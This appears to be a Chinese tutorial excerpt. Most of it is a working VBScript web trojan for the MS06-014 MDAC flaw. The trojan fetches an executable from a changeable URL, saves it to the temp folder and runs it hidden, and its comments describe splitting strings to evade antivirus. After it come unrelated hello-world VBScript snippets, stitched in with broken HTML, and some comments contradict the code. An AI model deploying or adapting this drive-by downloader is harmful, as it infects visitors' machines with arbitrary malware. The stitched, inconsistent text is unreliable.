网页木马不仅跟JavaScript有关,有些网页木马还可用VBScript编写,下面即是使用HTML和VBScript编写的MS06014的网页木马。
<script language="VBScript">
on error resume next '防错代码
dl = "hxxp://127.0.0.1/test.exe" '木马远程下载地址,可以将127.0.0.1改成其他
Set df = document.createElement("object") '创建项目
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
'对此项目进行编码
'注意:clsid:XXXX这一串是微软06014远程执行代码漏洞(msadco.dll)
str="Microsoft.XMLHTTP" '创建一个XMLHTTP对象
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4 '拆分代码以起到免杀的作用
str5=str1 '调换语句以达到免杀的作用
set S = df.createobject(str5,"") ''创建一个文件流对象
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send '以上步骤只是从网络上下载指定的木马程序
'下面开始在本机执行下载到的木马程序
fname1="Intranet.exe"
‘Intranet.exe是木马本地保存名称
set F = df.createobject("Scripting.FileSystemObject","") '建立一个文件对象
set tmp = F.GetSpecialFolder(2) 'GetSpecialFolder(2) '得到系统临时目录的路径
fname1= F.BuildPath(tmp,fname1) '注入到vip.com
S.open
S.write x.responseBody '把下载的文件写入数据流中
S.savetofile fname1,2 '把数据流存为文件,在系统临时目录里保存为vip.com
S.close
set Q = df.createobject("Shell.Application","")
'请注意这里'createobject("Shell.Application",""),创建一个shell对象
Q.ShellExecute fname1,"","","open",0 '执行刚才下载下来的木马
</script>
</html>
<head>
<title>
VBScript代码示例一
</title>
</head>
<body>
<p>第3章 VBScript实例一</p>
<script type="text/vbscript">
MsgBox("Hello,Everyone!")
</script>
</body>
</html>
<head>
<title>VBScript代码放在Head中</title>
<script type="text/vbscript">
MsgBox("Hello,Everyone!")
</script>
</head>
<body>
<p>第三章 VBScript实例二。</p>
</body>
</html>